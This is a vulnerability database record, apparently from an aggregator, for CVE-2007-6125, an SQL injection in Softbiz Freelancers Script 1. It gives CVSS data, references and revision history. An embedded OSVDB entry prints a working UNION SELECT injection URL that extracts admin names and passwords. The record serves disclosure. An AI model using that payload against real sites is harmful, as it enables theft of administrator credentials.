ID CVE-2007-6125Type cveReporter NVDModified 2017-09-28T21:29:49
Description
SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.
{"id": "CVE-2007-6125", "bulletinFamily": "NVD", "title": "CVE-2007-6125", "description": "SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.", "published": "2007-11-26T17:46:00", "modified": "2017-09-28T21:29:49", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6125", "reporter": "NVD", "references": ["https://www.exploit-db.com/exploits/4660", "http://www.securityfocus.com/bid/26569", "https://exchange.xforce.ibmcloud.com/vulnerabilities/38616"], "cvelist": ["CVE-2007-6125"], "type": "cve", "lastseen": "2017-09-29T14:25:36", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:softbiz:freelancers_script:1.0"], "cvelist": ["CVE-2007-6125"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.", "edition": 1, "enchantments": {}, "hash": "4261832e937be7ebb6e281570dcbc5044fedb54ba3e8d357509bc5874e860940", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6dac0f1cbf6008232b5a0ce7eafde552", "key": "cvelist"}, {"hash": "61ba258ee42cbadc1266631ed6f33750", "key": "references"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "d28f1d2e71675d1894b520d9838d933e", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "be9f77574bd22e71aa31f7389439f0ed", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a2204f98994661b98216365610b9bcf2", "key": "modified"}, {"hash": "ca45ad0097ff3ff00f6daa168f059a16", "key": "cpe"}, {"hash": "dc0ad33e47751e68c41524336959db8c", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "263762668541ff93ca9d4fcbb89d4410", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6125", "id": "CVE-2007-6125", "lastseen": "2016-09-03T09:48:01", "modified": "2008-11-15T02:03:25", "objectVersion": "1.2", "published": "2007-11-26T17:46:00", "references": ["http://www.securityfocus.com/bid/26569", "http://xforce.iss.net/xforce/xfdb/38616", "http://www.milw0rm.com/exploits/4660"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-6125", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T09:48:01"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:softbiz:freelancers_script:1.0"], "cvelist": ["CVE-2007-6125"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in search_form.php in Softbiz Freelancers Script 1 allows remote attackers to execute arbitrary SQL commands via the sb_protype parameter.", "edition": 2, "enchantments": {}, "hash": "94d0f2180812c7f9fb7d7fbe62030e032765e954e19077b16548e81400be7008", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "476391587d97da1a52fd703eb2795289", "key": "modified"}, {"hash": "85f91f8bd04be101e31b49d9ddc170b6", "key": "references"}, {"hash": "6dac0f1cbf6008232b5a0ce7eafde552", "key": "cvelist"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "d28f1d2e71675d1894b520d9838d933e", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "be9f77574bd22e71aa31f7389439f0ed", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ca45ad0097ff3ff00f6daa168f059a16", "key": "cpe"}, {"hash": "dc0ad33e47751e68c41524336959db8c", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "263762668541ff93ca9d4fcbb89d4410", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6125", "id": "CVE-2007-6125", "lastseen": "2017-07-29T11:22:22", "modified": "2017-07-28T21:34:02", "objectVersion": "1.3", "published": "2007-11-26T17:46:00", "references": ["http://www.securityfocus.com/bid/26569", "https://exchange.xforce.ibmcloud.com/vulnerabilities/38616", "http://www.milw0rm.com/exploits/4660"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-6125", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-29T11:22:22"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "ca45ad0097ff3ff00f6daa168f059a16"}, {"key": "cvelist", "hash": "6dac0f1cbf6008232b5a0ce7eafde552"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "be9f77574bd22e71aa31f7389439f0ed"}, {"key": "href", "hash": "263762668541ff93ca9d4fcbb89d4410"}, {"key": "modified", "hash": "e8ebc8d46ae302c93cc1d44ca919a80a"}, {"key": "published", "hash": "dc0ad33e47751e68c41524336959db8c"}, {"key": "references", "hash": "0862f4bbdd6868de56727fc75ebfc988"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "d28f1d2e71675d1894b520d9838d933e"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b906e36d1b1f006f6efc04609f9a2c8eb6fd11ebe27e3fe7ed4808f728ca6841", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:softbiz:freelancers_script:1.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"result": {"osvdb": [{"id": "OSVDB:38908", "type": "osvdb", "title": "Softbiz Freelancers Script search_form.php sb_protype Variable SQL Injection", "description": "## Manual Testing Notes\nsearch_form.php?sb_showresult=1&sb_protype=999999%20union/**/select/**/0,CoNcAt(0x4c6f67696e3a,sb_admin_name,0x3c686579206578706c6f69743e2050617373776f72643a,sb_pwd,0x3c686579206578706c6f69743e),2/**/from/**/sbprj_admin/*\n## References:\n[Secunia Advisory ID:27808](https://secuniaresearch.flexerasoftware.com/advisories/27808/)\n[Related OSVDB ID: 38907](https://vulners.com/osvdb/OSVDB:38907)\nOther Advisory URL: http://milw0rm.com/exploits/4660\nISS X-Force ID: 38616\n[CVE-2007-6125](https://vulners.com/cve/CVE-2007-6125)\nBugtraq ID: 26569\n", "published": "2007-11-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:38908", "cvelist": ["CVE-2007-6125"], "lastseen": "2017-04-28T13:20:34"}], "exploitdb": [{"id": "EDB-ID:4660", "type": "exploitdb", "title": "Softbiz Freelancers Script 1 - Remote SQL Injection Exploit", "description": "Softbiz Freelancers Script v.1 Remote SQL Injection Exploit. CVE-2007-6124,CVE-2007-6125. Webapps exploit for php platform", "published": "2007-11-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4660/", "cvelist": ["CVE-2007-6124", "CVE-2007-6125"], "lastseen": "2016-01-31T21:28:00"}]}}
